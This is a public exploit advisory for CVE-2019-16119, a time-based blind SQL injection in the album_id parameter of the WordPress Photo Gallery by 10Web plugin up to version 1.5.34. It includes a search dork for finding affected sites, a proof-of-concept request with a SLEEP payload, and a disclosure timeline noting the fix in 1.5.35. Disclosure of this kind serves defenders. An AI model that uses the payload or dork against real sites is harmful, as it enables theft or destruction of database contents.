Share
# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection  
# inurl:"\wp-content\plugins\photo-gallery"  
# Date: 09-10-2019  
# Exploit Author: MTK (http://mtk911.cf/)  
# Vendor Homepage: https://10web.io/  
# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip  
# Version: Up to v1.5.34  
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap  
# CVE : 2019-16119  
  
# Software description:  
Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.  
  
  
# Technical Details & Impact:  
Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from  
them.  
  
# POC  
In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC,  
  
1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&  
  
2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&  
  
  
# Timeline  
09-01-2019 - Vulnerability Reported  
09-03-2019 - Vendor responded  
09-04-2019 - New version released (1.5.35)  
09-10-2019 - Full Disclosure  
  
# References:  
https://wordpress.org/plugins/photo-gallery/#developers  
https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119